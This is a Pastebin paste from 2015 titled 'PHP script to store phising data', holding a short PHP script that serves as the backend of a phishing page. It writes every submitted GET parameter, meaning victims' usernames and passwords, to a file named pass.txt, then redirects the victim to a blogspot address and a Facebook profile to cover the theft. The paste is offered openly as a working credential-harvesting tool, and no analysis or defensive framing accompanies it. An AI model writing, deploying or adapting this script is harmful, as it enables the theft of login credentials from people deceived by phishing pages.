Advertisement
gersy

PHP script to store phising data

Jan 10th, 2015
271
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. <?php
  2. $handle = fopen("pass.txt", "a");
  3. foreach($_GET as $variable => $value) {
  4. fwrite($handle, $variable);
  5. fwrite($handle, "=");
  6. fwrite($handle, $value);
  7. fwrite($handle, "\r\n");
  8. $redirect = "http://mdwnntey.blogspot.com/";
  9. header("Location:$redirect ");
  10. }
  11. fwrite($handle, "\r\n");
  12. fclose($handle);
  13.  
  14. header('Location:http://facebook.com/prince.gersy2');
  15. exit;
  16. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement